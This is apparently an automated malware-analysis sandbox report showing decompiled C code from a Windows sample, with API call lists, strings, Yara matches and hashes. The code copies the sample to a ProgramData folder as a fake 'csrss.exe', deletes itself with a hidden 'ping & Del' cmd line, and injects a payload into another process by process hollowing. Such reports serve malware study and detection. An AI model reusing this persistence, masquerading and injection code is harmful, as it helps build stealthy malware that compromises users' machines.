                                                                                                                                          			E004076A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                                                          				char _v8;
                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                          				struct _STARTUPINFOW _v92;
                                                                                                                                          				short _v1116;
                                                                                                                                          				char _v1636;
                                                                                                                                          				short _v4196;
                                                                                                                                          				void* _t53;
                                                                                                                                          				WCHAR* _t54;
                                                                                                                                          				WCHAR* _t56;
                                                                                                                                          				WCHAR* _t58;
                                                                                                                                          				WCHAR* _t59;
                                                                                                                                          				WCHAR* _t60;
                                                                                                                                          				signed int _t62;
                                                                                                                                          				WCHAR* _t66;
                                                                                                                                          				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				_t156 =  *0x5d2e00 - 0xc350; // 0x0
				if(_t156 >= 0) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x5d1c4c;
					if( *0x5d1c4c == 0) {
						goto L39;
					} else {
						E00401BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E00407C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E00401B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E00401B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E00401B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E00401970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E00401A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "LKBNMTFJgl");
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E00401A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E00401970( &_v1116, "\\");
												E00401970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E00406D50();
												L17:
												_t66 = E004087C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E00401510();
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													__eflags =  *0x5d2e00;
													goto L39;
												} else {
													E00401510();
													_t143 = E004015E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E00408B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E00401740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E00401510();
																_t153 = _t155 + 4;
																__eflags =  *0x5d1300;
																if( *0x5d1300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E00408730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x5d2118 = 1;
																	_t87 =  *0x5d211c; // 0x218
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x5d2120; // 0x0
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E00401A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E00401970( &_v4196, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
																		E00401970( &_v4196, L"\" & \"");
																		E00401970( &_v4196,  &_v1116);
																		E00401970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E004015E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E00407FA0(_t130, _t143, 0x40aad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E00401970(_t143, "\\");
																			E00401970(_t143, "viTRMUuKeV");
																			E00401970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E00406D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E00401510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
                                                                                                                                          															}
                                                                                                                                          														} else {
                                                                                                                                          															L20:
                                                                                                                                          															_push(_t143);
                                                                                                                                          															L21:
                                                                                                                                          															E00401510();
                                                                                                                                          															_t153 = _t155 + 4;
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          													DeleteFileW( &_v1116);
                                                                                                                                          													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
                                                                                                                                          													E00401A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          													E00401970( &_v1636, "\\");
                                                                                                                                          													E00401970( &_v1636, "csrss.exe");
                                                                                                                                          													E00406340( &_v1636);
                                                                                                                                          													__eflags = 0;
                                                                                                                                          													return 0;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							 *0x5d2e00 =  &(( *0x5d2e00)[0]);
                                                                                                                                          							return _t53;
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}
0x004076a0
0x004076a8
0x004076ae
0x004076b5
0x00407a92
0x00407a92
0x00407a97
0x004076bb
0x004076bb
0x004076c3
0x00000000
0x004076c9
0x004076d2
0x004076da
0x004076e1
0x004076e5
0x004076ea
0x004076ec
0x004076f1
0x00407700
0x00407715
0x00407717
0x00407719
0x00407a7e
0x00407a7e
0x00000000
0x0040771f
0x0040771f
0x00407724
0x00000000
0x0040772a
0x00407734
0x00407739
0x0040773c
0x0040773e
0x004077ac
0x004077b8
0x004077be
0x004077c0
0x00000000
0x004077c6
0x004077c6
0x004077cb
0x00000000
0x004077d1
0x004077d6
0x004077de
0x004077e0
0x004077e2
0x00000000
0x004077e8
0x004077e8
0x004077ed
0x00000000
0x004077f3
0x004077fa
0x004077ff
0x00407802
0x0040780b
0x0040781e
0x0040782d
0x00407832
0x00407835
0x00407835
0x00407837
0x00407837
0x0040784b
0x00407850
0x00000000
0x00407850
0x004077ed
0x004077e2
0x004077cb
0x00407740
0x0040774a
0x0040774f
0x00407752
0x00407754
0x00000000
0x00407756
0x00407760
0x00407765
0x00407768
0x0040776a
0x00000000
0x0040776c
0x00407778
0x00407789
0x0040779a
0x0040779f
0x004077a2
0x00407853
0x0040785e
0x00407863
0x00407866
0x00407869
0x0040786b
0x00407a81
0x00407a81
0x00407a89
0x00407a89
0x00000000
0x00407871
0x00407871
0x00407883
0x00407885
0x00407888
0x0040788a
0x00407894
0x00407899
0x0040789c
0x0040789e
0x00407906
0x0040790b
0x00407910
0x00407913
0x00407914
0x00407916
0x00000000
0x00407918
0x00407918
0x0040791d
0x00407920
0x00407927
0x00407995
0x00407995
0x00407999
0x0040799e
0x004079a3
0x004079a3
0x004079ad
0x004079af
0x004079b4
0x004079b6
0x004079cc
0x004079cc
0x004079d1
0x004079d3
0x004079d8
0x004079d8
0x004079ea
0x004079fb
0x00407a0c
0x00407a1f
0x00407a30
0x00407a35
0x00407a58
0x00407a5e
0x00407a60
0x00407a6f
0x00407a74
0x00407a78
0x00407a78
0x004079b8
0x004079be
0x004079c4
0x004079c6
0x00000000
0x00000000
0x004079c6
0x00407929
0x00407933
0x00407935
0x00407938
0x0040793a
0x00407948
0x0040794d
0x00407950
0x00407952
0x00000000
0x00407958
0x0040795e
0x00407969
0x00407974
0x00407979
0x0040797c
0x00407982
0x00407984
0x00407985
0x00407987
0x00000000
0x0040798d
0x0040798d
                                                                                                                                          0x00407992
                                                                                                                                          0x00000000
                                                                                                                                          0x00407992
                                                                                                                                          0x00407987
                                                                                                                                          0x00407952
                                                                                                                                          0x0040793a
                                                                                                                                          0x00407927
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a0
                                                                                                                                          0x004078a1
                                                                                                                                          0x004078a1
                                                                                                                                          0x004078a6
                                                                                                                                          0x004078a6
                                                                                                                                          0x0040789e
                                                                                                                                          0x004078b0
                                                                                                                                          0x004078b2
                                                                                                                                          0x004078c5
                                                                                                                                          0x004078d6
                                                                                                                                          0x004078e7
                                                                                                                                          0x004078f3
                                                                                                                                          0x004078fb
                                                                                                                                          0x00407902
                                                                                                                                          0x00407902
                                                                                                                                          0x0040786b
                                                                                                                                          0x0040776a
                                                                                                                                          0x00407754
                                                                                                                                          0x0040773e
                                                                                                                                          0x00407724
                                                                                                                                          0x004076f3
                                                                                                                                          0x004076f3
                                                                                                                                          0x004076fe
                                                                                                                                          0x004076fe
                                                                                                                                          0x004076f1
                                                                                                                                          0x004076c3

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00407C30: InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                                                          • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 00407715
                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004078B0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CrackDeleteFileInternetLongNamePath
                                                                                                                                          • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$LKBNMTFJgl$ProgramData$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV$zJ@
                                                                                                                                          • API String ID: 3724707802-3486364815
                                                                                                                                          • Opcode ID: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                                                          • Instruction ID: 401daa4757a0587c7b000174fcf8883a011eebc5c06fd5704f7b7c2f209f5124
                                                                                                                                          • Opcode Fuzzy Hash: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                                                          • Instruction Fuzzy Hash: 1C91B9B1E4420876DB20B7A59C06FDB376CAF00745F04007BF904B21D2EA7CBA54CAAE
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E00405B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                                                                          				intOrPtr _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				void* _v20;
                                                                                                                                          				void* _v24;
                                                                                                                                          				void _v28;
                                                                                                                                          				long _v32;
                                                                                                                                          				char _v36;
                                                                                                                                          				intOrPtr _v40;
                                                                                                                                          				void* _v44;
                                                                                                                                          				char _v112;
                                                                                                                                          				struct _CONTEXT _v828;
                                                                                                                                          				intOrPtr _t62;
                                                                                                                                          				void* _t70;
                                                                                                                                          				void* _t72;
                                                                                                                                          				void* _t81;
                                                                                                                                          				void* _t82;
                                                                                                                                          				void* _t84;
                                                                                                                                          				signed int _t85;
                                                                                                                                          				void* _t90;
                                                                                                                                          				void* _t94;
                                                                                                                                          				void* _t95;
                                                                                                                                          				void* _t108;
                                                                                                                                          				void* _t115;
                                                                                                                                          				void* _t117;
                                                                                                                                          				void _t120;
                                                                                                                                          				intOrPtr _t123;
                                                                                                                                          				void* _t126;
                                                                                                                                          				void* _t132;
                                                                                                                                          				void* _t133;
                                                                                                                                          				intOrPtr* _t136;
                                                                                                                                          				void* _t137;
                                                                                                                                          				void* _t138;
                                                                                                                                          				void* _t142;
                                                                                                                                          				void* _t143;
                                                                                                                                          
                                                                                                                                          				_t115 = __ebx;
                                                                                                                                          				E00401BB0( &(_v828.Dr0), 0, 0x2c8);
                                                                                                                                          				_v28 = 0;
                                                                                                                                          				_t138 = _t137 + 0xc;
                                                                                                                                          				_v32 = 0;
                                                                                                                                          				_v828.ContextFlags = 0x10007;
                                                                                                                                          				_t142 =  *0x40c038 - 0x5a4d; // 0x6b7d
                                                                                                                                          				if(_t142 == 0) {
                                                                                                                                          					L3:
                                                                                                                                          					_t62 =  *0x40c074; // 0x383538b7
                                                                                                                                          					__eflags =  *((intOrPtr*)(_t62 + 0x40c038)) - 0x4550;
                                                                                                                                          					_t6 = _t62 + 0x40c038; // 0x3875f8ef
                                                                                                                                          					_t126 = _t6;
                                                                                                                                          					if( *((intOrPtr*)(_t62 + 0x40c038)) != 0x4550) {
                                                                                                                                          						L27:
                                                                                                                                          						__eflags = 0;
                                                                                                                                          						return 0;
                                                                                                                                          					} else {
                                                                                                                                          						E00401670( &_v112, 0, 0x44);
                                                                                                                                          						E00401670( &_v20, 0, 0x10);
                                                                                                                                          						_v112 = 0x44;
                                                                                                                                          						__eflags =  *0x5d1bb8;
                                                                                                                                          						_push( &_v20);
                                                                                                                                          						_push( &_v112);
                                                                                                                                          						_push(0);
                                                                                                                                          						_push(0);
                                                                                                                                          						if( *0x5d1bb8 == 0) {
                                                                                                                                          							_push(0x14);
                                                                                                                                          						} else {
                                                                                                                                          							_push(0x800000c);
                                                                                                                                          						}
                                                                                                                                          						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
                                                                                                                                          						__eflags = _t70;
                                                                                                                                          						if(_t70 == 0) {
                                                                                                                                          							goto L27;
                                                                                                                                          						} else {
                                                                                                                                          							_push(_t115);
                                                                                                                                          							_t14 =  &_v16; // 0x4049e6
                                                                                                                                          							_t72 = GetThreadContext( *_t14,  &_v828);
                                                                                                                                          							__eflags = _t72;
                                                                                                                                          							if(_t72 == 0) {
                                                                                                                                          								L26:
                                                                                                                                          								TerminateProcess(_v20, 0);
                                                                                                                                          								CloseHandle(_v16);
                                                                                                                                          								CloseHandle(_v20);
                                                                                                                                          								__eflags = 0;
                                                                                                                                          								return 0;
                                                                                                                                          							} else {
                                                                                                                                          								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
                                                                                                                                          								__eflags = _t81;
                                                                                                                                          								if(_t81 == 0) {
                                                                                                                                          									goto L26;
                                                                                                                                          								} else {
                                                                                                                                          									_t123 =  *((intOrPtr*)(_t126 + 0x34));
                                                                                                                                          									_t120 = _v28;
                                                                                                                                          									__eflags = _t120 - _t123;
                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                          										L13:
                                                                                                                                          										_t82 = E004072C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
                                                                                                                                          										_t132 = _t82;
                                                                                                                                          										_v24 = _t132;
                                                                                                                                          										__eflags = _t132;
                                                                                                                                          										if(_t132 == 0) {
                                                                                                                                          											goto L26;
                                                                                                                                          										} else {
                                                                                                                                          											asm("cdq");
                                                                                                                                          											_t124 =  &_v36;
                                                                                                                                          											_v44 = _t82;
                                                                                                                                          											_v40 = _t123;
                                                                                                                                          											_t84 = E004074D0(_t82,  &_v36, _v20, _t82, _t123, 0x40c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
                                                                                                                                          											__eflags = _t84;
                                                                                                                                          											if(_t84 == 0) {
                                                                                                                                          												goto L26;
                                                                                                                                          											} else {
                                                                                                                                          												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
                                                                                                                                          												_t117 = 0;
                                                                                                                                          												__eflags = 0 -  *(_t126 + 6);
                                                                                                                                          												if(0 >=  *(_t126 + 6)) {
                                                                                                                                          													L20:
                                                                                                                                          													_t42 = _t126 + 0x34; // 0x3875f923
                                                                                                                                          													_t90 = E004074D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
                                                                                                                                          													__eflags = _t90;
                                                                                                                                          													if(_t90 == 0) {
                                                                                                                                          														goto L26;
                                                                                                                                          													} else {
                                                                                                                                          														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
                                                                                                                                          														_t94 = SetThreadContext(_v16,  &_v828);
                                                                                                                                          														__eflags = _t94;
                                                                                                                                          														if(_t94 == 0) {
                                                                                                                                          															goto L26;
                                                                                                                                          														} else {
                                                                                                                                          															_t95 = E004071A0(0, _t124, _v16);
                                                                                                                                          															__eflags = _t95;
                                                                                                                                          															if(_t95 == 0) {
                                                                                                                                          																goto L26;
                                                                                                                                          															} else {
                                                                                                                                          																Sleep(0x1388);
                                                                                                                                          																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                                                          																__eflags = _t133;
                                                                                                                                          																if(_t133 != 0) {
                                                                                                                                          																	E00401BB0(_t133, 0, 0x138);
                                                                                                                                          																	E004074D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
                                                                                                                                          																	VirtualFree(_t133, 0, 0x8000);
                                                                                                                                          																}
                                                                                                                                          																CloseHandle(_v16);
                                                                                                                                          																CloseHandle(_v20);
                                                                                                                                          																return _v12;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t34 = _t126 + 0x2c; // 0x3875f91b
                                                                                                                                          													_t136 = _t34 + _t85;
                                                                                                                                          													asm("o16 nop [eax+eax]");
                                                                                                                                          													while(1) {
                                                                                                                                          														_t108 = E004074D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x40c038,  *((intOrPtr*)(_t136 - 4)), 0);
                                                                                                                                          														__eflags = _t108;
                                                                                                                                          														if(_t108 == 0) {
                                                                                                                                          															goto L26;
                                                                                                                                          														}
                                                                                                                                          														_t117 = _t117 + 1;
                                                                                                                                          														_t136 = _t136 + 0x28;
                                                                                                                                          														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
                                                                                                                                          														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
                                                                                                                                          															continue;
                                                                                                                                          														} else {
                                                                                                                                          															_t132 = _v24;
                                                                                                                                          															goto L20;
                                                                                                                                          														}
                                                                                                                                          														goto L28;
                                                                                                                                          													}
                                                                                                                                          													goto L26;
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
                                                                                                                                          										if(__eflags > 0) {
                                                                                                                                          											goto L13;
                                                                                                                                          										} else {
                                                                                                                                          											__eflags = E00407120(_t123, _v20, _t120, 0);
                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                          												goto L26;
                                                                                                                                          											} else {
                                                                                                                                          												goto L13;
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
                                                                                                                                          					_t138 = _t138 + 0x10;
                                                                                                                                          					_t143 =  *0x40c038 - 0x5a4d; // 0x6b7d
                                                                                                                                          					if(_t143 == 0) {
                                                                                                                                          						goto L3;
                                                                                                                                          					} else {
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				L28:
                                                                                                                                          			}
                                                                                                                                          0x00405cb5
                                                                                                                                          0x00405cac
                                                                                                                                          0x00405c9e
                                                                                                                                          0x00405c79
                                                                                                                                          0x00405c60
                                                                                                                                          0x00405bc6
                                                                                                                                          0x00405bd7
                                                                                                                                          0x00405bdc
                                                                                                                                          0x00405bdf
                                                                                                                                          0x00405be6
                                                                                                                                          0x00000000
                                                                                                                                          0x00405be8
                                                                                                                                          0x00405bee
                                                                                                                                          0x00405bee
                                                                                                                                          0x00405be6
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNEL32 ref: 00405C58
                                                                                                                                          • GetThreadContext.KERNEL32(I@,00010007,00000000,?,?,?,?,?,I@,?,?,?), ref: 00405C71
                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,I@,?,?,?), ref: 00405C96
                                                                                                                                          • SetThreadContext.KERNEL32(?,?,?,?,00000000,3875F923,00000004,?,?,00000000,?,0040C038,?,?,?,?), ref: 00405DA0
                                                                                                                                          • Sleep.KERNEL32(00001388,?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DBF
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DD3
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000040), ref: 00405E0F
                                                                                                                                          • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E1E
                                                                                                                                          • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E23
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                                                          • String ID: 0125789244697858$D$I@$I@
                                                                                                                                          • API String ID: 1428767187-3701513222
                                                                                                                                          • Opcode ID: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                                                          • Instruction ID: 2b955a6b4a58cd15ef933bbb3afc0f250c4904853c31c428a9eccdac0ead69e9
                                                                                                                                          • Opcode Fuzzy Hash: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                                                          • Instruction Fuzzy Hash: 91819071A40619ABEB109B90DD46FAFB7B8FB04704F044176FA04B62D0E775AA50CB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 57%
E00405A50(void* __ecx, void* _a4, void* _a8, long* _a12, char _a16) {
	/* Reads the PE headers of an image mapped in another process.
	   _a4: handle of the target process, _a8: remote image base,
	   _a12: receives OptionalHeader.SizeOfImage, _a16: pointer that
	   receives OptionalHeader.AddressOfEntryPoint. Returns 1 on success,
	   0 if any allocation or read fails or the headers are not MZ/PE. */
	void* _v8;
	void* _t31;
	int _t32;
	int _t36;
	void* _t44;
	long _t46;
	void* _t56;
	void* _t60;

	 *_a12 = 0;
	_t2 =  &_a16; // 0x40563b
	 *( *_t2) = 0;
	/* 0x40 bytes: the IMAGE_DOS_HEADER at the remote image base */
	_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
	if(_t56 == 0) {
		L3:
		return 0;
	} else {
		if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
			if( *_t56 != 0x5a4d) { /* e_magic "MZ" */
				goto L2;
			} else {
				_v8 =  *((intOrPtr*)(_t56 + 0x3c)); /* e_lfanew */
				VirtualFree(_t56, 0, 0x8000);
				/* 0x18 bytes: NT Signature + IMAGE_FILE_HEADER */
				_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
				if(_t44 == 0) {
					L11:
					return 0;
				} else {
					_t31 = _a8 + _v8;
					_v8 = _t31;
					_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
					if(_t32 == 0 ||  *_t44 != 0x4550) { /* Signature "PE\0\0" */
						/* decompiler rendered these frees as _push()/VirtualFree(); arguments resolved */
						VirtualFree(_t44, 0, 0x8000);
						goto L11;
					} else {
						/* FileHeader.SizeOfOptionalHeader + 0x18 = size of the full IMAGE_NT_HEADERS
						   (read before the buffer is released; the decompiler had placed it after) */
						_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
						VirtualFree(_t44, 0, 0x8000);
						_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
						if(_t60 == 0) {
							goto L11;
						} else {
							_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
							if(_t36 == 0 ||  *_t60 != 0x4550) {
								VirtualFree(_t60, 0, 0x8000);
								goto L11;
							} else {
								 *_a12 =  *(_t60 + 0x50); /* OptionalHeader.SizeOfImage */
								_t17 =  &_a16; // 0x40563b
								 *((intOrPtr*)( *_t17)) =  *((intOrPtr*)(_t60 + 0x28)); /* OptionalHeader.AddressOfEntryPoint */
								VirtualFree(_t60, 0, 0x8000);
								return 1;
							}
						}
					}
				}
			}
		} else {
			L2:
			VirtualFree(_t56, 0, 0x8000);
			goto L3;
		}
	}
}

                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,74B05B60,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A79
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A8C
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405A9E
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,I@,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AD8
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AF2
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B10
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B1F
                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B35
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B47
                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B6A
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                                                          • String ID: ;V@$I@
                                                                                                                                          • API String ID: 1260273505-1952863460
                                                                                                                                          • Opcode ID: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
